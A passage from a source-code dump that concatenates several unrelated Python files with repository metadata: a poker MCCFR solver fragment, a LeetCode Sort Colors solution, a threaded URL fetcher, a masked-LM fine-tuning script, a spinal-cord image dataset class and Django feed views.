    (matching the original behaviour).  ``locks["regret"]`` (if provided)
    guards the whole read-modify-write cycle.
    """
    if locks:
        locks["regret"].acquire()
    try:
        filepath = os.path.abspath("{}/{}_node_map.json".format(save_path, name))
        if os.path.isfile(filepath):
            with open(filepath, 'r', encoding='UTF-8') as r:
                jsonfile = json.load(r)
        else:
            jsonfile = {}
        for key, value in node_map.items():
            # JSON object keys are always strings; the original mixed int and
            # str keys, producing duplicate "0"-style entries in the dump.
            str_key = str(key)
            existing = jsonfile.get(str_key, {})
            valueDict = {}
            for info_set, node in value.items():
                # float() also converts numpy scalars, which json can't dump.
                regret_sum = {action: float(prob) for action, prob in node.regret_sum.items()}
                if info_set in existing:
                    # The original stored merged regrets as a *list* of
                    # single-entry dicts, which broke every subsequent merge;
                    # always store a plain action -> regret mapping instead.
                    prev = existing[info_set].get('regret_sum', {})
                    if isinstance(prev, dict):
                        for action, old in prev.items():
                            if action in regret_sum:
                                regret_sum[action] += old
                valueDict[info_set] = {'regret_sum': regret_sum}
            jsonfile[str_key] = valueDict
        with open(filepath, 'w', encoding='UTF-8') as w:
            w.write(json.dumps(jsonfile))
    finally:
        # Release even if the merge raises, so other workers don't deadlock.
        if locks:
            locks["regret"].release()
def subgame_slover(state,iter_num=100):
    """Solve a subgame rooted at ``state`` with ``iter_num`` MCCFR rounds.

    Builds a fresh (empty) node map, and each round re-samples unknown hands:
    every player that is still live and past the flop gets a new random Pair
    dealt from a reshuffled deck before the traversals run.
    Returns the trained node map ({player -> {info_set -> Node}}).
    (Name kept as-is for callers; "slover" is presumably a typo for "solver".)
    """
    n_players = state.num_players
    node_map = {i: {} for i in range(n_players)}
    for t in tqdm(range(1, iter_num + 1), desc='Training'):
        # Re-randomize hidden information for live, post-flop players.
        for i in range(n_players):
            if state._liveState[i] and state._flopState[i]:
                state.shuffle()
                state._pairs[i] = Pair(state._poker[:3])
        for player in range(n_players):
            # Same pruning schedule as train(): 95% pruned traversals after
            # prune_threshold iterations.
            if t > prune_threshold:
                chance = np.random.rand()
                if chance < .05:
                    mccfr(player, state, node_map)
                else:
                    mccfr(player, state, node_map, prune=True)
            else:
                mccfr(player, state, node_map)
    return node_map
| [
"noreply@github.com"
] | noreply@github.com |
a4e16aa3029986e19186a08d10ba6756a749ef85 | 865bd5e42a4299f78c5e23b5db2bdba2d848ab1d | /Python/75.sort-colors.132268888.ac.python3.py | 420999a7c4e65d780fb46607f6690cc3de47a52b | [] | no_license | zhiymatt/Leetcode | 53f02834fc636bfe559393e9d98c2202b52528e1 | 3a965faee2c9b0ae507991b4d9b81ed0e4912f05 | refs/heads/master | 2020-03-09T08:57:01.796799 | 2018-05-08T22:01:38 | 2018-05-08T22:01:38 | 128,700,683 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,386 | py | #
# [75] Sort Colors
#
# https://leetcode.com/problems/sort-colors/description/
#
# algorithms
# Medium (38.90%)
# Total Accepted: 217.5K
# Total Submissions: 559.1K
# Testcase Example: '[0]'
#
#
# Given an array with n objects colored red, white or blue, sort them so that
# objects of the same color are adjacent, with the colors in the order red,
# white and blue.
#
#
#
# Here, we will use the integers 0, 1, and 2 to represent the color red, white,
# and blue respectively.
#
#
#
# Note:
# You are not suppose to use the library's sort function for this problem.
#
#
# click to show follow up.
#
#
# Follow up:
# A rather straight forward solution is a two-pass algorithm using counting
# sort.
# First, iterate the array counting number of 0's, 1's, and 2's, then overwrite
# array with total number of 0's, then 1's and followed by 2's.
# Could you come up with an one-pass algorithm using only constant space?
#
#
#
class Solution:
    def sortColors(self, nums):
        """Sort an array of 0s, 1s and 2s in place (Dutch national flag).

        Single pass, O(1) extra space, modifies ``nums`` and returns None.
        """
        low, mid, high = 0, 0, len(nums) - 1
        while mid <= high:
            if nums[mid] == 0:
                # 0 belongs in the left region; grow it.
                nums[low], nums[mid] = nums[mid], nums[low]
                low += 1
                mid += 1
            elif nums[mid] == 1:
                # 1 is already in the middle region.
                mid += 1
            else:
                # 2 belongs in the right region; the swapped-in value is
                # unexamined, so don't advance mid.
                nums[mid], nums[high] = nums[high], nums[mid]
                high -= 1
| [
"miylolmiy@gmail.com"
] | miylolmiy@gmail.com |
470680c22dc232542067bccb9341ef99207ae529 | 2b476ebcd5e2b4fdd153b438003c5e2b61d0e9bd | /multiRequests.py | 1b7625147c8e4b11eb90b93a7faa080efb1c535d | [
"MIT"
] | permissive | coolkingcole/py3_multithread_requests | 24b103e3d44c214ce747522619b64cad5ece5605 | f22e445210e7d1b377f5fb4525dd8826525ec791 | refs/heads/main | 2023-02-12T14:05:08.672951 | 2021-01-03T19:50:19 | 2021-01-03T19:50:19 | 324,894,234 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,650 | py | import queue
import threading
import time
import sys
import requests
class ThreadUrl(threading.Thread):
    """Worker thread: pulls URLs from ``in_queue``, GETs each one, and pushes
    ``[url, response]`` pairs to ``out_queue`` (the response slot holds the
    string ``"request_failed"`` when the request raises)."""

    def __init__(self, inqueue, outqueue, kwargs):
        threading.Thread.__init__(self)
        self.in_queue = inqueue
        self.out_queue = outqueue
        self.kwargs = kwargs  # extra keyword arguments forwarded to requests.get

    def run(self):
        while True:
            # Grab the next URL from the queue (blocks until one is available).
            host = self.in_queue.get()
            try:
                # The original called requests.get(host, enumerate(self.kwargs)),
                # which passed an enumerate object as the positional ``params``
                # argument; forward the stored keyword arguments instead.
                requestObj = requests.get(host, **self.kwargs)
            except Exception as e:
                requestObj = "request_failed"
                print(e)
            chunk = [host, requestObj]
            self.out_queue.put(chunk)
            # Signal the queue that this job is done.
            self.in_queue.task_done()
class DatamineThread(threading.Thread):
    """Collector thread: endlessly drains result chunks from ``out_queue``
    into the shared ``outList``."""

    def __init__(self, out_queue, outList):
        super().__init__()
        self.out_queue = out_queue
        self.outList = outList

    def run(self):
        while True:
            # Block until a finished chunk arrives, record it, then mark the
            # queue item as processed so queue.join() can return.
            item = self.out_queue.get()
            self.outList.append(item)
            self.out_queue.task_done()
class multiRequests:
    """Fetches a list of URLs concurrently and returns [url, response] pairs."""

    def __init__(self, urlList, threadCount, **kwargs):
        self.urlList = urlList
        self.threadCount = threadCount
        self.kwargs = kwargs  # forwarded to every worker thread

    def run(self):
        """Spawn worker and collector threads, feed the URL queue, and block
        until every URL has been fetched and collected; returns the results."""
        pending = queue.Queue()
        finished = queue.Queue()
        collected = []

        # Daemon workers pull URLs from `pending`, push results to `finished`.
        for _ in range(self.threadCount):
            worker = ThreadUrl(pending, finished, self.kwargs)
            worker.daemon = True
            worker.start()

        for url in self.urlList:
            pending.put(url)

        # A pair of collector threads drain `finished` into `collected`.
        for _ in range(2):
            collector = DatamineThread(finished, collected)
            collector.daemon = True
            collector.start()

        # Wait until every URL has been fetched and every result recorded.
        pending.join()
        finished.join()
        return collected
| [
"noreply@github.com"
] | noreply@github.com |
3bcd8c0c02adfd97e228048b85313243c62ab2ef | 3167e46c75cda7fe5b4550347631b172763fc175 | /test_train.py | 0db583c8df5620c605638499d1c3a2df6a45f4c2 | [] | no_license | SuhaasBhat/CC_DATA | d85e89dbb7451a016787190986158d8c3290dda9 | 96deceddc465fb774380a1bb14673260e9483fd7 | refs/heads/main | 2023-01-23T18:47:13.416663 | 2020-11-09T20:47:27 | 2020-11-09T20:47:27 | 311,454,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | from transformers import GPT2LMHeadModel, GPT2Config, GPT2Tokenizer, LineByLineTextDataset, DataCollatorForLanguageModeling, Trainer, TrainingArguments
from transformers import RobertaTokenizerFast, RobertaForMaskedLM, RobertaConfig
import process_txt_data as ptd
#import torch
# Fine-tune a masked-LM on the AmFam text corpus via the HF Trainer.
# NOTE(review): GPT-2 objects below are built but unused in the actual run --
# only the BERT/Roberta path is trained.
tokenizer = GPT2Tokenizer.from_pretrained("gpt2", pad_token = '<pad>')
# NOTE(review): a RobertaTokenizerFast loaded from a DistilBERT checkpoint --
# confirm this tokenizer/model pairing is intended.
bertTokenizer = RobertaTokenizerFast.from_pretrained("distilbert-base-uncased")
path = "amfamdata1.txt"
# Dataset is tokenized with the GPT-2 tokenizer even though the BERT collator
# below re-masks with bertTokenizer -- TODO confirm.
dataset = ptd.AmfamDataset(tokenizer=tokenizer, file_path = path, block_size = 128)
# Causal-LM collator (unused in the final Trainer call).
data_collator = DataCollatorForLanguageModeling(tokenizer = tokenizer, mlm = False)
# Masked-LM collator: 15% of tokens masked per batch.
bert_data_collator = DataCollatorForLanguageModeling(tokenizer = bertTokenizer, mlm = True, mlm_probability = 0.15)
#config = GPT2Config()
model = GPT2LMHeadModel.from_pretrained('gpt2')
#device = torch.device('cuda')
#bertConfig = RobertaConfig(
#    vocab_size=52_000,
#    max_position_embeddings=514,
#    num_attention_heads=12,
#    num_hidden_layers=6,
#    type_vocab_size=1,
#)
# Load pre-trained weights rather than training from a fresh config.
bertModel = RobertaForMaskedLM.from_pretrained('distilbert-base-uncased')
#bertModel = RobertaForMaskedLM(config = bertConfig)
training_args = TrainingArguments(
    output_dir = "./TrainerAmFamBERTv2",
    overwrite_output_dir = True,
    num_train_epochs = 1,
    per_device_train_batch_size = 32,
    save_steps = 1_000,
    save_total_limit = 10)
trainer = Trainer(
    model = bertModel,
    args = training_args,
    data_collator = bert_data_collator,
    train_dataset = dataset,
    prediction_loss_only = True
)
trainer.train()
trainer.save_model("./TrainerAmFamBERTv2")
##I really want to use pytorch for this stuff, the Trainer does not make me happy
| [
"ubuntu@ip-10-160-198-158.ec2.internal"
] | ubuntu@ip-10-160-198-158.ec2.internal |
c7ee79f81e71c46a87d58a9599bef995068c3961 | 5c956c53f4fd9d98a94abf0d8c378a45eb0476b1 | /home/forms.py | 4e1d29850b57766e715f709702292f09e84d68b8 | [] | no_license | PrarthiVyas/Hotelina | 7d3535998784d51201662d1b4460abb57f33ba95 | b865971b3c9abea7d7bea8347a729782a9ed8870 | refs/heads/main | 2023-06-17T04:07:55.413608 | 2021-07-17T11:00:13 | 2021-07-17T11:00:13 | 381,929,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | from django import forms
from .models import *
# Create your forms here.
class AvailableForm(forms.Form):
    """Availability search form: room category plus check-in/check-out datetimes
    (datetime-local widget format, e.g. 2021-07-17T14:30)."""
    # Choices must be an ordered sequence of (value, label) pairs; the original
    # used a set literal, which renders the <select> options in arbitrary order.
    ROOM_CATEGORIES = [
        ('AC', 'AC'),
        ('NON_AC', 'NON-AC'),
        ('DELUX', 'DELUX'),
    ]
    room_category = forms.ChoiceField(choices=ROOM_CATEGORIES, required=True)
    check_in = forms.DateTimeField(required=True, input_formats=["%Y-%m-%dT%H:%M", ])
    check_out = forms.DateTimeField(required=True, input_formats=["%Y-%m-%dT%H:%M", ])
| [
"prarthivyas218@gmail.com"
] | prarthivyas218@gmail.com |
a0d92a8d6c46aa5a0eb9efd323e336c5e8815128 | 9b64080dac6e4bc586f5af9404a0ea338ce00559 | /tests/test_menu.py | 84404f4bf6d7616f58f57c43d9a4da5de942768c | [] | no_license | KrzysztoPy/tic_tac_toe_simple | 1c7dc183c0e099324b3b5b18f90f281742d19a8c | fff7e02cc654cee5c92b7e828b85fec650274222 | refs/heads/master | 2023-08-07T18:13:48.126489 | 2021-10-01T13:46:55 | 2021-10-01T13:46:55 | 395,326,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,081 | py | from main_menu.main_menu.menu_options import *
from unittest.mock import patch
# NOTE(review): the patch target 'xyz.xyz.checking_the_correctness_of_the_selection'
# looks like a placeholder module path -- confirm it matches the real module
# (main_menu.main_menu.menu_options) or the mock is never applied.
@patch('xyz.xyz.checking_the_correctness_of_the_selection')
def test_processing_of_external_data_first_is_false(mock_checking_the_correctness_of_the_selection):
    mock_checking_the_correctness_of_the_selection.return_value = None
    result = data_analysis_for_compilance_with_the_guidelines('mock_none')
    assert result is None


def test_processing_of_external_data_first_is_true_sec_is_false():
    result = data_analysis_for_compilance_with_the_guidelines('0')
    assert result is None


def test_processing_of_external_data_first_and_sec_is_true_select_opt_1():
    result = data_analysis_for_compilance_with_the_guidelines('1')
    assert result == 1


def test_processing_of_external_data_first_and_sec_is_true_select_opt_2():
    result = data_analysis_for_compilance_with_the_guidelines('2')
    assert result == 2


def test_processing_of_external_data_first_and_sec_is_true_select_opt_3():
    result = data_analysis_for_compilance_with_the_guidelines('3')
    assert result == 3


def test_checking_the_correctness_of_the_selection_wrong_input_data_0():
    result = check_which_user_data_is_integer('z')
    assert result is None


def test_checking_the_correctness_of_the_selection_correct_input_data_0():
    result = check_which_user_data_is_integer('0')
    assert result is not None


def test_checking_the_correctness_of_the_selection_correct_input_data_1():
    result = check_which_user_data_is_integer('-10')
    assert result is not None


def test_checking_the_correctness_of_the_selection_correct_input_data_2():
    result = check_which_user_data_is_integer('5')
    assert result is not None


# Renamed from a duplicate `..._correct_input_data_2`: redefining a test with
# the same name shadows the earlier one, so pytest silently skipped it.
def test_checking_the_correctness_of_the_selection_none_input():
    result = check_which_user_data_is_integer(None)
    assert result is None


# Renamed for the same reason (third duplicate of `..._correct_input_data_2`).
def test_checking_the_correctness_of_the_selection_empty_string_input():
    result = check_which_user_data_is_integer('')
    assert result is None


def test_checking_the_correctness_of_the_range_wrong_range_0():
    result = checking_the_correctness_of_the_range(-1)
    assert result is None


def test_checking_the_correctness_of_the_range_wrong_range_1():
    result = checking_the_correctness_of_the_range(0)
    assert result is None


def test_checking_the_correctness_of_the_range_wrong_range_3():
    result = checking_the_correctness_of_the_range(4)
    assert result is None


def test_checking_the_correctness_of_the_range_wrong_range_4():
    result = checking_the_correctness_of_the_range(7)
    assert result is None


def test_checking_the_correctness_of_the_range_correct_range_0():
    result = checking_the_correctness_of_the_range(1)
    assert result is not None


def test_checking_the_correctness_of_the_range_correct_range_1():
    result = checking_the_correctness_of_the_range(3)
    assert result is not None
"geraltrivia19@gmail.com"
] | geraltrivia19@gmail.com |
6153ed244acbd1deac19c433cbd01c43350d4ff4 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /2gFkEsAqNZrs4yeck_13.py | 0e96182a63f5aad185cacd1b5bcad33ff13d32f2 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | """
Write a function that returns all the elements in an array that are **strictly
greater** than their adjacent left and right neighbors.
### Examples
mini_peaks([4, 5, 2, 1, 4, 9, 7, 2]) ➞ [5, 9]
# 5 has neighbours 4 and 2, both are less than 5.
mini_peaks([1, 2, 1, 1, 3, 2, 5, 4, 4]) ➞ [2, 3, 5]
mini_peaks([1, 2, 3, 4, 5, 6]) ➞ []
### Notes
* Do not count boundary numbers, since they only have **one** left/right neighbor.
* If no such numbers exist, return an empty array.
"""
def mini_peaks(lst):
    """Return the interior elements of ``lst`` that are strictly greater than
    both of their immediate neighbors (boundary elements never qualify)."""
    triples = zip(lst, lst[1:], lst[2:])
    return [mid for left, mid, right in triples if left < mid > right]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
a8e763a04f78152641c42acfb6f4274a34e67f6f | a9555d0e7417db4ea68ab73a46ffe5d6fd7b631a | /chapter2/int_fun.py | 2e74b87088a1f32a9629d9e8e032b87355ff7347 | [] | no_license | bindalraghav/Pythoncodes | ade74f2a8709e609b51ce2c754c4de204cafbf87 | 1d6d11c88ef9ef36826729e557ea95d32dc47b9d | refs/heads/master | 2021-01-03T11:13:25.300928 | 2020-03-18T15:07:20 | 2020-03-18T15:07:20 | 240,052,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | num1=int(input("enter 1st num"))
num2=int(input("enter 2nd num"))  # second addend, read from stdin
num3=num1+num2  # sum of the two user-supplied integers
print(num3)
"bindalraghav10@gmail.com"
] | bindalraghav10@gmail.com |
879b1c3f764e6498f9a7a553de77fbb731b85af3 | 83fbcbcc674ade1ee920b6fdc6ebc472b3833c76 | /SpinalCord/GANUNet/data0/zgan_dataset.py | 65248e3aa55a3b4ea42832496dc8b37632ed087e | [] | no_license | mulanshine/GitHubResearch | 35b12da7311e7e6c21a613ed20a33e0cada24610 | 95b5b24857a0766ed327baf1ab89715e748ddf89 | refs/heads/master | 2020-05-02T20:27:09.455603 | 2019-04-03T11:07:40 | 2019-04-03T11:07:40 | 175,150,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,816 | py | import os.path
from data.base_dataset import BaseDataset
from data.image_folder import make_dataset
from PIL import Image
import numpy as np
import torch
import torchvision.transforms as transforms
import math
# anisotropic diffusion
def f(lam, b):
    """Perona-Malik conduction coefficient exp(-(lam/b)^2) for gradient
    ``lam`` and edge-stopping parameter ``b``."""
    return np.exp((-1 * np.power(lam, 2)) / np.power(b, 2))
def anisodiff(im, steps, b, lam=0.25):
    """Run ``steps`` iterations of Perona-Malik anisotropic diffusion on the
    2-D array ``im`` and return the smoothed result.

    ``b`` is the edge-stopping parameter fed to ``f``; ``lam`` is the
    integration step.  Note: the one-pixel border of the output is zero (each
    update writes only the interior of a zero-initialized buffer), and
    ``steps == 0`` returns ``im`` itself unchanged.
    """
    buf = np.zeros(im.shape, dtype=im.dtype)
    for _step in range(steps):
        center = im[1:-1, 1:-1]
        # Finite differences toward the four neighbors.
        dn = im[:-2, 1:-1] - center
        ds = im[2:, 1:-1] - center
        de = im[1:-1, 2:] - center
        dw = im[1:-1, :-2] - center
        # Conduction-weighted flux; the RHS is fully evaluated before being
        # written back, so aliasing im with buf on later steps is safe.
        buf[1:-1, 1:-1] = center + lam * (f(dn, b) * dn + f(ds, b) * ds +
                                          f(de, b) * de + f(dw, b) * dw)
        im = buf
    return im
# use(80,48),resize to (80,48) for generator
class ZganDataset(BaseDataset):
    @staticmethod
    def modify_commandline_options(parser, is_train):
        """No dataset-specific CLI options: return the parser unchanged."""
        return parser
    def initialize(self, opt):
        """Record the options and collect the sorted list of image paths
        under <dataroot>/cropimage_rect."""
        self.opt = opt
        self.root = opt.dataroot
        self.phase = opt.phase
        self.imgdir = os.path.join(opt.dataroot,'cropimage_rect')
        self.imgpaths = make_dataset(self.imgdir)
        # Sort for a deterministic sample order across runs.
        self.imgpaths = sorted(self.imgpaths)
    def __getitem__(self, index):
        """Return one sample dict: transformed RGB image, its binary relation
        map (from the grayscale copy), the source path, and the pre-pad image
        shape."""
        imgpath = self.imgpaths[index]
        # Site prefix in the filename selects the per-site resize factor.
        name = imgpath.split('/')[-1]
        imgL = Image.open(imgpath).convert('L')
        imgRGB = Image.open(imgpath).convert('RGB')
        # Both transforms return (tensor, shape); the shapes should agree, and
        # the second assignment overwrites the first -- presumably identical.
        imgL, image_shape = self.imgtransform_L(imgL,name)
        imgRGB, image_shape = self.imgtransform_RGB(imgRGB,name)
        aff = self.binary_relation_map(imgL)
        # aff = self.compute_relation_map(imgL)
        return {'img': imgRGB, 'aff':aff, 'path': imgpath,'shape':image_shape}
def get_padshape(self, image):
if image.shape[0] <= 80 and image.shape[1] <= 64:
hight = 80
weight = 64
pad_weight1 = int((weight - image.shape[1])/2)
pad_weight2 = weight - image.shape[1] - pad_weight1
pad_hight1 = int((hight - image.shape[0])/2)
pad_hight2 = hight - image.shape[0] - pad_hight1
elif image.shape[0] > 80 and image.shape[1] <= 64:
print("#######################>80or<48#######################################")
print(image.shape[0],image.shape[1])
weight = 64
pad_weight1 = int((weight - image.shape[1])/2)
pad_weight2 = weight - image.shape[1] - pad_weight1
pad_hight1 = 0
pad_hight2 = 0
elif image.shape[0] < 80 and image.shape[1] > 64:
print("#######################<80or>48#######################################")
print(image.shape[0],image.shape[1])
hight = 80
pad_weight1 = 0
pad_weight2 = 0
pad_hight1 = int((hight - image.shape[0])/2)
pad_hight2 = hight - image.shape[0] - pad_hight1
elif image.shape[0] > 80 and image.shape[1] > 64:
print("#######################>80or>48#######################################")
print(image.shape[0],image.shape[1])
pad_weight1 = 0
pad_weight2 = 0
pad_hight1 = 0
pad_hight2 = 0
return pad_weight1, pad_weight2, pad_hight1, pad_hight2
def imgtransform_L(self, image, name):
size = np.array(image, dtype=np.uint8).shape
if name.startswith('site1') or name.startswith('site2'):
image = image.resize((math.ceil(2*size[1]),math.ceil(2*size[0])), Image.BICUBIC)
image = np.asarray(image, np.float32)
elif name.startswith('site4'):
image = image.resize((math.ceil(1.16*size[1]),math.ceil(1.16*size[0])), Image.BICUBIC)
image = np.asarray(image, np.float32)
elif name.startswith('site3'):
image = np.array(image, dtype=np.float32)
image = image / 255.0
mean = image.mean()
std = image.std()
pad_weight1, pad_weight2, pad_hight1, pad_hight2 = self.get_padshape(image)
image = np.pad(image,((pad_hight1, pad_hight2),(pad_weight1, pad_weight2)),"constant")
# image = anisodiff(image, 4, 0.1, 0.1)
# normalize image
image = (image - mean)/(std+1e-10)
image = (image - image.min()) / (image.max()-image.min()+1e-10) * 2.0
image = image - 1.0
image_shape = image.shape
image = np.expand_dims(image, axis=0)
image = torch.FloatTensor(image)
return image, image_shape
def imgtransform_RGB(self, image, name):
size = np.array(image).shape
if name.startswith('site1') or name.startswith('site2'):
image = image.resize((math.ceil(2*size[1]),math.ceil(2*size[0])), Image.BICUBIC)
image = np.asarray(image, np.float32)
elif name.startswith('site4'):
image = image.resize((math.ceil(1.16*size[1]),math.ceil(1.16*size[0])), Image.BICUBIC)
image = np.asarray(image, np.float32)
elif name.startswith('site3'):
image = np.array(image, dtype=np.float32)
image = image / 255.0
mean = image.mean()
std = image.std()
pad_weight1, pad_weight2, pad_hight1, pad_hight2 = self.get_padshape(image)
image = np.pad(image,((pad_hight1, pad_hight2),(pad_weight1, pad_weight2),(0,0)),"constant")
# image = anisodiff(image, 3, 0.1, 0.1)
# normalize image
image = (image - mean)/(std+1e-10)
image = (image - image.min()) / (image.max()-image.min()) * 2.0
image = image - 1.0
image_shape = image.shape
image = image.transpose((2,0,1))
image = torch.FloatTensor(image)
return image, image_shape
def binary_relation_map(self,image):
images_from = np.array(image,dtype=np.float32)[0]
images_pad = np.pad(images_from,((1,1),(1,1)),'constant')
images_to = np.zeros((8,images_from.shape[0],images_from.shape[1])) #,constant_values = (0.0,0.0)
images_to[0] = images_pad[:-2, 2:]
images_to[1] = images_pad[1:-1,2:]
images_to[2] = images_pad[2:, 2:]
images_to[3] = images_pad[:-2,1:-1]
images_to[4] = images_pad[2:,1:-1]
images_to[5] = images_pad[:-2,:-2]
images_to[6] = images_pad[1:-1,:-2]
images_to[7] = images_pad[2:, :-2]
diff_maps = images_to - images_from
diff_maps[diff_maps>=0] = 1.0
diff_maps[diff_maps<0] = 0.0
relation_map = torch.FloatTensor(diff_maps)
return relation_map
def compute_relation_map(self, image):
images_from = np.array(image,dtype=np.float32)[0]
images_pad = np.pad(images_from,((1,1),(1,1)),'constant')
images_to = np.zeros((8,images_from.shape[0],images_from.shape[1])) #,constant_values = (0.0,0.0)
images_to[0] = images_pad[:-2, 2:]
images_to[1] = images_pad[1:-1,2:]
images_to[2] = images_pad[2:, 2:]
images_to[3] = images_pad[:-2,1:-1]
images_to[4] = images_pad[2:,1:-1]
images_to[5] = images_pad[:-2,:-2]
images_to[6] = images_pad[1:-1,:-2]
images_to[7] = images_pad[2:, :-2]
diff_maps = images_to - images_from
relation_map = (diff_maps - diff_maps.min()) / (diff_maps.max()-diff_maps.min()+1e-10) * 2.0
relation_map = relation_map - 1.0
relation_map = torch.FloatTensor(relation_map)
return relation_map
def __len__(self):
return len(self.imgpaths)
def name(self):
return 'ZganDataset'
| [
"1952221507@qq.com"
] | 1952221507@qq.com |
524a0e10cc960c05791d380963683f0e8e163f49 | 545ab856301e0c6c3bfded93e3f1ef3eab9611b7 | /closends/views/main_page.py | cc47f688a0172e0f6b00a7017bbf9b7ee51f7f54 | [] | no_license | HITXYZ/Closends | bd64994c6e9acc514f8dcc43000521b52a66353f | b68461fc4bc8fc24738ecd65b3387a63af1f91f7 | refs/heads/master | 2021-08-30T01:36:16.142129 | 2017-12-13T06:26:54 | 2017-12-13T06:26:54 | 106,384,430 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,285 | py | from django.shortcuts import render
from django.core.cache import cache
from django.core.paginator import Paginator
from django.core.paginator import EmptyPage
from django.core.paginator import PageNotAnInteger
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth.decorators import login_required
from django.contrib.contenttypes.models import ContentType
from ..models import WeiboContent, Image
from ..tasks import cached_query_all, cached_query_platform, \
cached_query_group, cached_query_topic, update_all_cache
"""
动态主页模块:
平台、分组、主题、时间、关键字查询
"""
topic_name = ['体育', '健康', '动漫', '女性', '娱乐', '房产',
'教育', '文学', '新闻', '旅游', '时尚', '校园',
'汽车', '游戏', '生活', '科技', '美食', '育儿', '财经']
@csrf_exempt
@login_required
def query_all(request, page=1):
    """
    Render the main feed: every friend's content from all platforms
    (Weibo, Zhihu, Tieba), merged, sorted by publication date descending
    and paginated 20 items per page.
    """
    user = request.user.userinfo
    username = request.user.username
    friends = user.friend_set.all()
    # group_list is stored as a comma-separated string on the user profile;
    # the templates expect (index, name) pairs.
    group_list = user.group_list.split(',')
    group_list = list(enumerate(group_list))
    topic_list = list(enumerate(topic_name))
    paginator = cache.get(username + '_paginator')
    # 'updated_list' holds usernames whose crawled content changed since
    # their caches were built; membership forces a rebuild below.
    updated_list = cache.get_or_set('updated_list', set())
    if username in updated_list:
        flag = True
        updated_list.remove(username)
        cache.set('updated_list', updated_list, None)  # None timeout -> cache forever
        cache.delete(username + '_paginator')
        # Asynchronously refresh every cached page belonging to this user.
        keys = cache.keys(username + '*')
        update_all_cache.delay(keys)
    elif not paginator:
        flag = True  # cache miss: build the page inline below
    else:
        flag = False  # cached paginator is fresh; reuse it
    if flag:
        # Kick off the async cache fill, then build this response inline.
        cached_query_all.delay(username)
        all_contents = []
        for friend in friends:
            weibo_contents = friend.weibocontent_set.all()
            zhihu_contents = friend.zhihucontent_set.all()
            tieba_contents = friend.tiebacontent_set.all()
            content_type = ContentType.objects.get_for_model(WeiboContent)
            # Attach the generically-related Image rows to each weibo post
            # (original posts vs. reposts store their flags separately).
            for content in weibo_contents:
                if not content.is_repost:
                    if content.has_image:
                        content.images = Image.objects.filter(content_type=content_type, object_id=content.id)
                else:
                    if content.origin_has_image:
                        content.origin_images = Image.objects.filter(content_type=content_type, object_id=content.id)
            all_contents += weibo_contents
            all_contents += zhihu_contents
            all_contents += tieba_contents
        all_contents.sort(key= lambda content: content.pub_date, reverse=True)
        paginator = Paginator(all_contents, 20)
    # Clamp out-of-range / non-integer page numbers instead of erroring.
    try:
        contents = paginator.page(page)
    except PageNotAnInteger:
        contents = paginator.page(1)
    except EmptyPage:
        contents = paginator.page(paginator.num_pages)
    result = {'group_list': group_list,
              'topic_list': topic_list,
              'contents': contents}
    return render(request, 'closends/index.html', result)
@csrf_exempt
@login_required
def query_by_platform(request, platform, page=1):
    """
    Render the feed filtered to a single platform ('weibo', 'zhihu' or
    'tieba'), sorted by publication date descending, 20 items per page.
    """
    user = request.user.userinfo
    username = request.user.username
    friends = user.friend_set.all()
    group_list = user.group_list.split(',')
    group_list = list(enumerate(group_list))
    topic_list = list(enumerate(topic_name))
    # Per-user, per-platform paginator cache key.
    paginator = cache.get(username + '_' + platform + '_paginator')
    updated_list = cache.get_or_set('updated_list', set())
    if username in updated_list:
        flag = True
        updated_list.remove(username)
        cache.set('updated_list', updated_list, None)  # None timeout -> cache forever
        cache.delete(username + '_' + platform + '_paginator')
        # Asynchronously refresh every cached page belonging to this user.
        keys = cache.keys(username + '*')
        update_all_cache.delay(keys)
    elif not paginator:
        flag = True  # cache miss: build inline below
    else:
        flag = False
    if flag:
        cached_query_platform.delay(username, platform)
        all_contents = []
        if platform == 'weibo':
            for friend in friends:
                all_contents += friend.weibocontent_set.all()
            content_type = ContentType.objects.get_for_model(WeiboContent)
            # Attach the generically-related Image rows to each weibo post.
            for content in all_contents:
                if not content.is_repost:
                    if content.has_image:
                        content.images = Image.objects.filter(content_type=content_type, object_id=content.id)
                else:
                    if content.origin_has_image:
                        content.origin_images = Image.objects.filter(content_type=content_type, object_id=content.id)
        elif platform == 'zhihu':
            for friend in friends:
                all_contents += friend.zhihucontent_set.all()
        elif platform == 'tieba':
            for friend in friends:
                all_contents += friend.tiebacontent_set.all()
        all_contents.sort(key=lambda content: content.pub_date, reverse=True)
        paginator = Paginator(all_contents, 20)
    # Clamp out-of-range / non-integer page numbers instead of erroring.
    try:
        contents = paginator.page(page)
    except PageNotAnInteger:
        contents = paginator.page(1)
    except EmptyPage:
        contents = paginator.page(paginator.num_pages)
    result = {'group_list': group_list,
              'topic_list': topic_list,
              'current_platform': platform,
              'contents': contents}
    return render(request, 'closends/display_platform.html', result)
@csrf_exempt
@login_required
def query_by_group(request, group, page=1):
    """
    Render the feed filtered to the friend group at index *group* in the
    user's group_list, sorted by publication date descending, 20 per page.
    """
    user = request.user.userinfo
    username = request.user.username
    friends = user.friend_set.all()
    # Kept un-enumerated here because group_list[int(group)] is used for
    # filtering and cache keys; enumerated for the template further down.
    group_list = user.group_list.split(',')
    topic_list = list(enumerate(topic_name))
    paginator = cache.get(username + '_' + group_list[int(group)] + '_paginator')
    updated_list = cache.get_or_set('updated_list', set())
    if username in updated_list:
        flag = True
        updated_list.remove(username)
        cache.set('updated_list', updated_list, None)  # None timeout -> cache forever
        cache.delete(username + '_' + group_list[int(group)] + '_paginator')
        # Refresh all of this user's cached pages, matching the behaviour of
